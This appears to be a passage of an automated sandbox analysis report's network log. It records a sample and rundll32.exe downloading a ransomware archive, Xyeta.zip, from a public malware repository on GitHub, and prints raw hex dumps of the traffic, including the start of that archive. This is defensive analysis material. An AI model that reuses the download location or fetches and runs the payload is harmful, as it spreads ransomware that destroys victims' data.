                                                                                                                                                2022-09-29 12:49:27 UTC7672INData Raw: 5b 2a 2b bd 73 a5 39 0e b4 4d e0 96 28 c2 00 2c 4e 8d c8 d4 31 13 f1 46 96 1d 8d 13 f8 ac d9 71 aa 01 32 48 1a 49 7f e3 6b 6c 3a 5c 6d d4 59 b2 93 d0 25 46 12 c6 df 6a 77 ff d7 dd 5a 6f 22 c3 35 d4 65 0a f4 ef 8f de 7b 21 d0 0a 4b 84 a8 c3 36 b7 2e 27 d2 a0 4c a5 a1 13 36 87 b9 51 fd 53 ff f6 dd 60 a9 39 48 c9 ea 2a 6e 10 bd a5 3f 21 f2 d5 0c 9b 1b a7 2a 57 7c 63 fe b1 4a ca 8c 3b f2 83 b2 59 e3 ab 27 af 4c f9 82 9a 3e ba 96 b0 ae 8d 0b e6 ff 23 e7 71 14 6c 8c f0 71 38 71 7a bd 43 02 2b 15 33 c8 53 71 c4 f9 24 24 d5 c5 f6 f0 db f5 f8 b3 de bb db b2 9d 4f c1 d5 38 bd 34 f5 dd 13 46 0b 42 b4 95 c0 24 1f f9 09 13 24 78 ca 42 af 14 fe 63 5e c4 a2 ba 10 0b a4 1a ee 52 ed 7c 9e d3 08 91 9d 81 a4 7a 89 4b 43 83 66 71 c8 50 7e 0f bb c5 7d c1 d7 cf 94 cb c3 c0 58
                                                                                                                                                Data Ascii: [*+s9M(,N1Fq2HIkl:\mY%FjwZo"5e{!K6.'L6QS`9H*n?!*W|cJ;Y'L>#qlq8qzC+3Sq$$O84FB$$xBc^R|zKCfqP~}X
                                                                                                                                                2022-09-29 12:49:27 UTC7688INData Raw: 59 84 c3 a7 f2 5b 87 0e da a7 8a a8 31 91 29 51 f3 60 d5 2f 50 1c d0 cd ac e1 cd 1d 59 3d 85 e7 fc cb f1 09 a9 fc 58 6c 1b 48 9e ed ce 0a 5b 31 fd 6b 42 61 7c 7a f9 13 28 de d1 e8 16 3f 33 ac 58 ea db fd 5b a6 8e 0e 84 22 01 f8 f7 58 46 9b d1 f6 1f ae 9a db e6 85 61 01 e5 cc dd 41 70 0f 24 c3 3c 6c 05 1c 35 58 75 3a ee ec ff cd 7f 4f fe 1a 14 38 d4 74 09 c6 c8 3c 06 0f 00 03 44 9c 52 66 78 f5 07 9e 98 18 81 1c 4c a4 62 65 7b 3f 65 1c 32 ca 26 13 00 03 5d 5c 0b 92 66 8e 8b aa da de a4 83 b9 98 20 9a 34 14 1f 2d 1b ed bc 9f ce 1c 62 98 4a 86 c3 52 2a e6 a2 0d db 93 28 00 0a 04 fd cc af 52 04 d6 8d 24 6e ac c5 f3 a5 64 06 f0 7a 55 88 2d 61 89 13 04 86 d2 e2 df e4 e1 91 27 da 0a dc 30 e1 4f ab 8d 58 c7 95 66 4f 8c 19 b6 ac eb c4 d9 f7 9d 8a 47 8a e1 0e 00 31
                                                                                                                                                Data Ascii: Y[1)Q`/PY=XlH[1kBa|z(?3X["XFaAp$<l5Xu:O8t<DRfxLbe{?e2&]\f 4-bJR*(R$ndzU-a'0OXfOG1


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                56192.168.2.349740140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:35 UTC7700OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                57140.82.121.4443192.168.2.349740C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:35 UTC7700INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:28 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:49:35 UTC7701INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                58192.168.2.349742185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:35 UTC7702OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                59185.199.108.133443192.168.2.349742C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:35 UTC7702INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 77102
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "3aa8e4e319c7c273c5d9fc9071b3c14c66404cc71f0c3bd72a0137f90c54bbe3"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: BC80:0543:E4C491:F3028B:6335934D
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:35 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6924-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455775.408019,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 78290953c8444fb716a6afbeaf60b7fd38d3f02a
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:54:35 GMT
                                                                                                                                                Source-Age: 274
                                                                                                                                                2022-09-29 12:49:35 UTC7703INData Raw: 50 4b 03 04 14 00 01 00 08 00 3b 0c 3d 3e 89 23 ff 7d 80 2c 01 00 00 50 01 00 14 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 58 79 65 74 61 2e 65 78 65 e0 56 04 74 2a 4a 9d b0 12 3a 4b 00 4a 15 97 da eb db 90 28 9e 54 ae ce 0c 86 03 d2 18 7f a9 7a 76 ec 1d b8 f3 06 2b 6a 51 00 b5 73 d8 81 6c 15 ae 27 4f 5a 02 f3 35 ad 61 07 63 7d 2e 8e 3e f1 f3 2b 88 4d e4 5c 81 c5 e4 b7 17 43 2c 63 ab 0f c5 a0 45 17 4c 36 40 6d 6c a0 44 f5 2f 82 26 57 0e b1 66 5e bd c6 8b 13 60 9e 97 dc 8a 06 8b 1f fa 02 54 b6 25 08 75 90 c3 c0 98 58 ae 9e d6 1e c7 c4 25 e8 17 46 ff a0 69 e6 e7 16 27 10 46 8b 84 04 12 ca 52 2d 8c 38 bf 39 66 3a d3 ec fe ff ee 80 c3 64 f1 c7 e2 47 64 d1 42 02 f1 2f de a4 13 00 26 67 12 63 bb 54 97 c0 50 23 d8 5d a0 3e 77 7f 89 26 53 5c 7f 69 13 62 13 98 e6
                                                                                                                                                Data Ascii: PK;=>#},PEndermanch@Xyeta.exeVt*J:KJ(Tzv+jQsl'OZ5ac}.>+M\C,cEL6@mlD/&Wf^`T%uX%Fi'FR-89f:dGdB/&gcTP#]>w&S\ib
                                                                                                                                                2022-09-29 12:49:35 UTC7705INData Raw: 83 57 89 ed 4b aa 09 90 16 7e b6 e5 79 0b 4f 61 87 92 06 55 ed ce a3 f3 03 5f 8c 6e b2 31 a0 02 70 eb fc 13 5c 82 8f cb a3 7d 82 e9 73 29 47 56 cb 7c 7d b8 ee b4 47 16 35 b5 e9 29 d6 06 65 c5 50 8b 65 3f 4c ee e9 62 7a 44 17 13 7b 9d bb 0c d4 39 a4 fd 1f c0 ae 88 f0 6d ae 06 cb e5 72 86 7a 9d a6 be 72 a2 35 b3 8d 62 51 74 ba 41 39 a3 db aa 1a e5 23 bd 8f 61 bd 55 6c 28 fb c3 12 3c 91 5a e4 bd e9 85 57 f2 9e a8 cf 6a 01 61 8c 78 f0 ea 6c f0 eb 99 eb fa 1d a1 9d 6b 60 00 ad f0 58 f1 a7 55 04 a8 ec cc 45 cf 41 af ed 3a 54 28 b2 b6 80 00 f8 f6 cb a9 c0 f0 4e 9e e6 4f b2 a2 3a b8 e1 58 90 a6 7b 22 2a e3 c4 d4 b6 d9 b0 99 42 a3 49 b4 75 65 63 19 ac 98 2f f6 a2 eb 55 e0 49 d1 50 ce 43 60 5a 97 e4 b9 a1 7d bb 6f 12 c1 9f 93 43 e9 ba d5 c8 4c 2d be 27 7b b0 4d b5
                                                                                                                                                Data Ascii: WK~yOaU_n1p\}s)GV|}G5)ePe?LbzD{9mrzr5bQtA9#aUl(<ZWjaxlk`XUEA:T(NO:X{"*BIuec/UIPC`Z}oCL-'{M
                                                                                                                                                2022-09-29 12:49:35 UTC7706INData Raw: 93 ef 83 97 4d 06 85 7b 85 5c 2a 19 d3 78 b1 42 ee cf 1f 21 d2 40 09 25 ac 9d 04 46 ee d3 5e 48 a5 a9 a6 6c 57 7a c5 eb 42 14 f3 df 5e 3c b9 37 28 00 bd 7e d8 ac a0 81 64 2b c1 2b db 8c 2b 3f 4b d8 9d 4f 5b 18 9f 0b f2 f7 67 f5 c8 ff 1c 5f f8 32 13 a0 fa a8 ac 01 0e c7 08 a9 3e 78 de 7b 16 ce 7c bb 0d 9d f7 c6 91 99 d5 5a fd 15 c3 09 1b 32 40 98 6b 2f 4d 82 16 59 7d 06 6c 7c 99 7f 30 88 86 95 83 7d cd f9 a9 e9 b9 d4 20 ad 3c a9 87 82 ba 61 20 63 9e 83 74 1e a3 9b 3b b7 f0 79 fd 9a 30 bc 17 e1 0f 3a 8c d5 4e b7 1f a2 88 45 04 2c 7b 21 92 3f 22 8d 3b 94 88 33 68 d3 54 df 39 53 bb bf 2f ba 2b ec 1b 44 61 01 1a 47 90 08 13 ab bd 02 4b 25 ee 0e 18 a3 9b 00 02 7e 96 9a a7 3c 96 3e 48 32 ae 38 4a bc 15 0b 4a f0 46 ac d6 a2 e1 39 d8 fa ea 81 a6 f8 4b 28 9a 93 ce
                                                                                                                                                Data Ascii: M{\*xB!@%F^HlWzB^<7(~d+++?KO[g_2>x{|Z2@k/MY}l|0} <a ct;y0:NE,{!?";3hT9S/+DaGK%~<>H28JJF9K(
                                                                                                                                                2022-09-29 12:49:35 UTC7707INData Raw: 61 c3 50 77 b4 f4 36 dc 00 e9 66 86 ad 18 be 52 59 02 60 6a e0 7f 1c 2f d0 cf b8 65 b8 c9 63 16 21 04 26 22 44 6b 6c 86 ad a4 89 7e 36 88 f9 04 14 60 f7 74 20 b4 fa 68 3c 2b ac 76 81 e8 e8 4e 9f 88 5f 4e 25 2a 38 19 90 f7 7c f1 08 c7 bb 0f 46 1f f7 11 c6 a8 97 e2 cb bd fa 93 e6 15 c7 0d 7c 2f 05 23 ac c8 57 0b 4a 38 1b 7c 59 d0 22 72 6f 51 74 6d d6 fa 5f 83 ef da cd 1f 69 a8 e0 57 4c d9 5a e7 a0 01 80 e5 85 1c 89 e5 d9 8c fd 01 d1 15 e5 63 08 7b 9d 3d 44 69 7d 31 2a 6c 28 b1 7c be 4b 27 43 68 96 43 bf 1a c0 f0 7b ed 66 38 59 e9 0c 60 35 7c 0e f4 47 cb 30 91 55 82 4d a6 b1 29 7d 33 09 4d 44 c7 e2 9c 51 da 81 26 56 9b 40 1c af 77 0e 74 8a 50 96 97 4a f5 0d 36 ae 73 26 62 12 15 d1 87 e3 ea 47 1c 79 5f e8 35 2a b0 79 79 d4 8b c4 d3 9f e8 40 e6 89 09 e5 fa c7
                                                                                                                                                Data Ascii: aPw6fRY`j/ec!&"Dkl~6`t h<+vN_N%*8|F|/#WJ8|Y"roQtm_iWLZc{=Di}1*l(|K'ChC{f8Y`5|G0UM)}3MDQ&V@wtPJ6s&bGy_5*yy@
                                                                                                                                                2022-09-29 12:49:35 UTC7709INData Raw: 1c 5f b0 02 d9 16 34 4e 7a 93 71 76 c1 3c cc 3d 42 23 b6 9e 75 73 59 93 c4 88 e9 2d 3a ac 26 15 17 89 3d 3f 3f 58 58 c2 99 29 6b d0 27 43 2d e0 f3 2e bf 4f 71 52 9c cb ad 7e c8 d5 85 f9 57 3b c3 00 e3 d8 93 f7 5f 4e a6 76 f8 67 a9 00 bd d3 49 43 30 73 8e f1 1b 1c e8 6e 9b 85 fc e8 2b 3e d3 18 e1 94 3d f7 c2 df dc ef 97 6e 99 a2 77 16 90 da 15 e9 9a 94 c8 a8 35 1e bc 3b 87 fd 16 3c 6d c6 36 8d 78 87 73 c5 3f ca 44 f4 11 2f d6 02 a9 e3 39 1e 4c 9c 08 3e c5 74 8e 7f 94 c9 a4 24 c0 5e 49 04 27 74 ae dc 71 35 70 46 07 ca 34 40 d9 2f 1f 6b d1 b7 0c f6 fa 69 e6 55 15 24 81 99 1a 4a fd 44 22 56 13 78 11 aa 6e 6d 8f e0 46 25 1d e8 ee 3c 3b 90 64 b1 7a 3b b0 6a c5 93 e8 c9 0c 19 25 a4 2d 8b ec c9 7b 0a 89 14 74 d2 44 bf 1d 4b ea 5f 19 2f 8c 94 34 74 d6 78 f7 ce 89
                                                                                                                                                Data Ascii: _4Nzqv<=B#usY-:&=??XX)k'C-.OqR~W;_NvgIC0sn+>=nw5;<m6xs?D/9L>t$^I'tq5pF4@/kiU$JD"VxnmF%<;dz;j%-{tDK_/4tx
                                                                                                                                                2022-09-29 12:49:35 UTC7710INData Raw: 48 7b c5 33 46 47 c7 65 2e ad 1f 80 29 0b 1c 57 28 70 e4 de 76 91 ac 9f a5 da e2 e2 da 27 cd 8d f4 17 37 b7 1f 30 f1 1b d3 18 c2 56 41 f4 57 c9 04 f9 dd 69 b7 bb 9b fc 2f 82 b8 db 5d fa fb 40 ae 8d db da ca d1 24 6b 50 d3 be 8e 8a 79 47 e0 52 d5 5f fe 2c 78 d4 0b ae f8 0f ba 6c 68 c2 26 ff b6 6a 53 87 9b e8 31 51 5b 0b 42 95 0a d4 6f e2 6f b4 3c 6a 75 3c d7 ba d2 24 4c 33 06 9c b3 23 fa a5 bc a5 e3 15 f1 03 16 ab ab 61 4d 8b 6d 41 67 a5 37 d1 c1 e9 da c4 f8 fd e6 9b 68 64 2c 8f e6 3a da ac 5d ab 0f 0d 56 2b ed 2f 39 b2 52 81 54 64 cf b2 60 ef 74 fc 2f 96 1b 51 cd fd f8 9a 12 89 15 74 74 b7 72 24 65 a5 2c f9 f2 80 c0 8c b9 69 55 d4 81 45 e1 01 dd b8 82 d7 b3 83 9f 92 bd ff fc 82 ce ce 16 f1 7b 9b bb 5c 43 84 2e 55 dd 9c 49 f3 76 88 0a 02 26 56 dc 67 b5 b1
                                                                                                                                                Data Ascii: H{3FGe.)W(pv'70VAWi/]@$kPyGR_,xlh&jS1Q[Boo<ju<$L3#aMmAg7hd,:]V+/9RTd`t/Qttr$e,iUE{\C.UIv&Vg
                                                                                                                                                2022-09-29 12:49:35 UTC7711INData Raw: 5e 6b 33 bc 58 36 85 0b 3e 87 ad 4a d9 c8 0b 73 36 e7 bc eb b5 d4 50 23 a0 81 00 7c 5f 2a b1 d2 2c 54 be b3 99 69 aa c9 f0 26 1d 72 da 8a d6 c7 c2 4b 54 95 51 9b 21 a3 a7 ee f9 d6 b7 bb 67 f8 2b 44 a9 52 3a 83 20 60 fb a7 39 3e 6b 54 d4 d4 d9 35 3c c2 fa 95 fd 62 d4 58 47 f3 d8 54 66 d9 75 b1 ff 43 18 34 96 db 6d a7 76 32 51 06 d9 3c cd 32 24 2d c3 e8 0c 7e 9f 91 f1 01 c7 36 f2 61 82 5a 94 b3 79 0e cc ac c0 32 2a 2c 4d 44 c6 53 e8 db 18 be 7b 32 b3 4f 75 c2 a4 b2 d7 57 34 14 7e fd 02 4f 03 26 d3 1e 28 4e e5 5f e3 f3 02 d8 1e 02 42 ca 21 ff 93 df 50 8f b2 43 12 01 e5 25 44 7f 10 7d 3f 52 bb 31 cd 1f 5c 4c 47 69 a2 92 b4 07 c6 f5 6f 2d 01 e9 c5 e7 d5 32 3f 10 1a eb fa 80 72 47 08 10 ff fa 03 01 f0 ad d3 f7 53 c9 20 b9 0b 69 b4 72 4a 63 4d 25 88 98 22 9d cd
                                                                                                                                                Data Ascii: ^k3X6>Js6P#|_*,Ti&rKTQ!g+DR: `9>kT5<bXGTfuC4mv2Q<2$-~6aZy2*,MDS{2OuW4~O&(N_B!PC%D}?R1\LGio-2?rGS irJcM%"
                                                                                                                                                2022-09-29 12:49:35 UTC7713INData Raw: 73 8c 93 5f 16 a3 c4 b5 cb c6 a2 3c a5 c5 f5 42 12 2d a1 65 0f 26 35 53 a6 9d 32 46 c5 d9 fc b9 99 cc 73 e0 7f db ab 66 15 79 ec e3 8f 9c 98 c6 f3 84 f9 aa 76 92 78 be 77 2a ef f8 e8 2b e7 46 57 40 61 b0 1e 02 72 e1 e1 c2 d5 f4 09 af f9 0b 4d 78 a3 95 2f 2d e2 3a 8c ef 8b 91 f1 57 b1 3e d1 3f 2d 37 1a 5e 71 e8 0e 61 e7 98 2c 37 46 e9 b1 4e 40 4b eb 47 48 8f f8 3b 4f 36 b2 28 e1 57 ed ad e6 1c df b0 99 50 0c be b9 7a b7 ab 3a 0d d9 db c2 f1 d3 22 59 34 e1 7d 67 58 b4 fa 40 44 e8 cb e1 c9 ac 5e 3b 0a 51 74 1a 94 25 1a 93 fe 67 07 50 8a 1d a6 67 69 d7 3e 48 5d cc 9b 4e 35 a0 d4 58 31 55 32 e3 90 5a b2 e4 db 73 f4 9c 74 10 0a 60 37 9d 05 6c 67 a0 ab 08 b9 2b f5 dd 0e 2b e9 0e 75 72 30 40 d6 1f f4 20 dc 04 08 9a af 6c 52 72 af 11 b6 f1 c2 96 98 55 dd af f3 73
                                                                                                                                                Data Ascii: s_<B-e&5S2Fsfyvxw*+FW@arMx/-:W>?-7^qa,7FN@KGH;O6(WPz:"Y4}gX@D^;Qt%gPgi>H]N5X1U2Zst`7lg++ur0@ lRrUs
                                                                                                                                                2022-09-29 12:49:35 UTC7714INData Raw: bb a4 5c b2 31 34 86 d5 8e de a2 d6 e9 a0 c7 2d ee bd 02 88 19 86 ff 9b 89 66 bf a4 7f 1f 84 0c 72 a3 9f f5 71 0f e4 45 b7 47 b9 02 76 ee ee 75 08 42 41 b7 27 93 80 1e e5 d8 05 13 e6 fe fe e0 11 6d 8f 02 e8 91 af ec 1a 02 50 5a 89 56 41 4b 2d cd df 65 cf ed e3 fb a8 f4 80 16 27 77 98 4c 7c 86 45 8d d7 79 d0 ae c4 7e 7c 1f 59 68 fd d2 45 f5 31 02 8d ec d5 2a 57 58 89 c9 8c ff 97 24 f0 6e b9 c2 dd f3 7a dc 63 41 20 fe 1f 4c ba 7e 9c c5 1f df 81 74 35 52 90 17 81 de 78 de 08 e9 fc e3 d0 ce f1 1a bd b1 48 75 29 34 e7 f4 ee 31 c2 a4 d2 62 e7 16 9b 31 f1 11 c4 da fa 22 91 9e 17 2e 91 f2 b1 1a 3f bb a9 3c 62 1b 7e b4 f9 8e 4c 19 53 f3 9e bb 14 3a 0f d2 35 0a ea c9 85 1b 57 d6 f1 a5 99 a9 ce 47 cd a4 d6 36 46 1b 25 11 9b 63 01 2f b6 88 80 ad 99 53 2c 43 99 8a 8d
                                                                                                                                                Data Ascii: \14-frqEGvuBA'mPZVAK-e'wL|Ey~|YhE1*WX$nzcA L~t5RxHu)41b1".?<b~LS:5WG6F%c/S,C
                                                                                                                                                2022-09-29 12:49:35 UTC7715INData Raw: ab a8 cd c9 26 95 e6 d8 40 c6 4d a1 99 c4 61 99 9f eb 49 2a 90 f3 4a 34 4b 64 3b c7 43 05 5d 71 5e 08 a0 b5 3f 80 79 0b 7b f4 1b 92 29 8a 70 ec 12 b3 7a d1 27 40 c3 45 25 60 35 d0 c5 70 e7 ea f8 c2 ff c2 a3 0f e5 45 61 79 11 c8 bb f6 b3 30 5b 11 58 43 9d 0c aa 0f 97 3f 02 92 93 dc fb 86 5f e0 ec aa ad 6f 37 19 ab e9 d3 1f 96 73 c2 8e 40 97 28 61 21 9c 4e 63 90 19 d3 d6 59 1b 45 f1 45 a0 f8 0a ef 30 4b 36 27 19 a4 80 00 a8 a0 cc 4f c3 14 ab ec 43 df 76 91 62 cf db 8e 62 e4 e6 d5 fe 8c b0 15 6a 04 ae 9e a3 5e c3 89 e8 00 75 a2 a5 cc 21 96 88 b3 5e e9 06 dc 67 dd 6e 2c 8f f4 09 ff 05 18 7c b3 52 d9 d6 60 fa 98 df 35 d2 c7 94 2e 2f 00 b8 fa b7 ce 1c 01 80 8d 85 40 33 55 60 d1 5a 3e 2f 82 51 7f b3 a1 a4 82 84 2f 80 7f bb c6 8b f2 97 32 0d 93 29 56 97 a4 07 cd
                                                                                                                                                Data Ascii: &@MaI*J4Kd;C]q^?y{)pz'@E%`5pEay0[XC?_o7s@(a!NcYEE0K6'OCvbbj^u!^gn,|R`5./@3U`Z>/Q/2)V
                                                                                                                                                2022-09-29 12:49:35 UTC7717INData Raw: 65 09 5d 4a dc a6 c2 e3 23 af eb 96 8e ee 14 d4 9e 46 36 3b e9 de 53 03 eb 8b 08 0e 06 ec 96 da d1 87 58 36 f0 04 fb 49 92 64 bf 41 b5 55 d1 c0 c4 57 90 ac af e9 dc 6d ec aa a6 b4 8f e0 8d e0 c0 4a 84 20 5d 80 6b f1 23 62 83 eb a3 bd ff b4 1a 8d 2e 1f e9 b3 5a 89 49 eb 56 09 bd e7 a2 8e c3 33 59 e1 53 13 0d 3a 9e 0d 0f f3 de 52 9b 39 78 62 d8 82 78 08 b7 20 52 df cb 43 ec bd f7 ae 5c c5 11 fe 9a 6f be ed 1a 38 56 92 5a bc a7 a9 6e d7 0b 95 f5 4e af 5b c0 1c 23 da f6 ac 4b a0 cd b1 db c1 ee e0 b2 c3 b4 62 21 1d 5d f8 ef 34 06 39 df 50 03 a0 b7 1e 18 d5 17 84 0b f2 61 1f 65 36 d6 d6 00 22 65 3b 6a e9 c8 9e 51 d9 92 fc 5f 9f 76 50 3b 6f e7 eb bb 60 d5 38 66 10 a4 74 62 fc ac aa c2 73 84 21 6c de 21 40 0f e0 36 5b a6 84 0b 9c 8e 56 02 da fe 06 15 e9 a2 0c 0c
                                                                                                                                                Data Ascii: e]J#F6;SX6IdAUWmJ ]k#b.ZIV3YS:R9xbx RC\o8VZnN[#Kb!]49Pae6"e;jQ_vP;o`8ftbs!l!@6[V
                                                                                                                                                2022-09-29 12:49:35 UTC7718INData Raw: a5 98 f0 c0 34 d1 7d 12 29 c5 d1 1e a5 14 f9 e3 1b 99 5c 21 e4 24 fb 42 cb 67 e8 57 65 70 3a f2 f8 b3 ce 36 42 06 a8 4b 11 73 0e 43 79 0e 8a 3e 4e 4e 1d 89 4d 94 7a f9 5d 7e da 23 af a8 90 1e 19 91 8e 67 7a 11 3a 7f ef 59 50 3b 33 8b 08 b1 8c 71 14 a4 58 f8 8c 09 27 d7 0a 95 f2 7a c6 d8 b8 76 8c 8a 5b 4c 0b 01 3c 58 20 e4 87 79 4e 84 d0 4e 52 d2 f9 4b 98 56 46 de 64 3d 50 49 0a ef 30 e0 83 c3 33 2e 1b 1e 95 d2 6b 5d de eb dd d1 4f 73 49 3e 35 df 36 b3 79 10 29 c8 9f 61 d0 a0 7f 7d 43 63 eb 12 e8 a7 d1 58 11 54 ad c5 66 72 d9 e4 a7 d2 e3 0f 2a e2 c1 42 be 6a 62 80 98 ab 90 ba e3 46 07 44 bc d9 d8 7d 60 c9 68 73 cc 60 cb cf c7 d7 da cc aa a0 25 e3 ff e4 a1 09 7b df 7d 42 27 7a 6a 88 2c 50 48 be ee 62 1b cc c4 18 9c e5 d6 95 a9 bf 55 db 97 fe 43 3c d0 0c b7
                                                                                                                                                Data Ascii: 4})\!$BgWep:6BKsCy>NNMz]~#gz:YP;3qX'zv[L<X yNNRKVFd=PI03.k]OsI>56y)a}CcXTfr*BjbFD}`hs`%{}B'zj,PHbUC<
                                                                                                                                                2022-09-29 12:49:35 UTC7718INData Raw: 56 ee aa 6f b2 e3 b6 42 e1 69 78 e4 b5 01 46 af 64 4d bc 5e 2d 66 05 56 ac b6 87 16 18 7b d3 e0 b8 d7 68 c2 ff d3 8f 3d 9a f9 19 47 89 65 72 de f9 5b 1c 8e 6c c3 3f d9 5e 3c d6 1a fa 2b 54 99 df 34 15 75 3d d5 36 ed 55 fd 0a 3a 38 4c 20 74 61 88 c5 ab 02 85 fa 4f bd dd 60 0a 2a c9 09 88 6f 42 87 ce e9 5f 69 67 49 67 7f 2b 6a 4c df b8 38 3c 53 7d b3 9b 6b 27 68 3f 6a 49 19 19 44 59 21 d4 e5 a8 9d b8 4b f7 05 df 96 e9 a8 96 fb 49 23 03 ed 98 4d 2a a4 4a 67 cc 47 8c 0e 32 7b dc 4a 1e 11 bb b6 0a af 3b cd 84 74 1e cc 74 84 86 8f 02 2d e9 c4 c9 2e e7 5a bf 3b 19 24 07 0b b3 d0 4c e4 e7 00 52 3e 2d dd 94 8d c3 59 71 88 2f e2 2c 7e 91 62 92 d5 0d 80 0a fe 94 d8 56 0f 41 2b 2a ac 14 28 33 7f fd aa 8a b0 af 14 2a 00 7e d6 22 0f aa 15 5f 92 9c 38 c6 70 49 f5 84 6d
                                                                                                                                                Data Ascii: VoBixFdM^-fV{h=Ger[l?^<+T4u=6U:8L taO`*oB_igIg+jL8<S}k'h?jIDY!KI#M*JgG2{J;tt-.Z;$LR>-Yq/,~bVA+*(3*~"_8pIm
                                                                                                                                                2022-09-29 12:49:35 UTC7734INData Raw: 2e ad eb 73 3f 16 24 79 e2 05 7c 52 35 b9 b5 77 b9 58 0b e7 fd d2 e0 76 3c 17 c9 12 c5 2e e4 9e 36 e4 e8 56 6e 88 41 56 eb 47 3b a9 c0 e9 3a b7 fa 1c 44 75 50 84 d3 5b a0 5e cd 97 9d 2f bd 25 62 bb 7b 00 6e 42 7e 00 d7 f0 5c 2f b2 d8 4c f6 e8 d9 39 1c 80 41 5a 8e 1d e6 d5 fb ef 30 12 ee a6 b8 3b 59 e1 10 52 e8 06 2c 7c bd 68 50 c8 d9 06 a5 f6 bd d7 18 22 82 a9 72 14 a6 b8 61 12 f4 2d d4 24 d2 c3 a9 99 ec b2 55 72 e4 60 9b 4a 01 49 8a 02 ff 62 64 5d d4 b9 7b c0 1c eb a3 e4 4a 7d a8 73 4d 2a b6 de de 7f 38 fa 6d 61 80 fc a8 5f 2b d8 8a 08 e2 0f 87 51 ea c2 1b 50 39 8d ee 95 aa fc 58 8d 78 be 25 33 c3 d9 02 22 68 00 b2 ca 07 de a1 fe d5 95 2b 3d 06 fa b3 e1 28 4b 9f 66 21 0f 5c 92 64 46 83 b8 e7 ac a8 74 0e 31 2d 53 d2 d7 1c b5 41 b4 39 3f c7 19 cc a1 54 47
                                                                                                                                                Data Ascii: .s?$y|R5wXv<.6VnAVG;:DuP[^/%b{nB~\/L9AZ0;YR,|hP"ra-$Ur`JIbd]{J}sM*8ma_+QP9Xx%3"h+=(Kf!\dFt1-SA9?TG
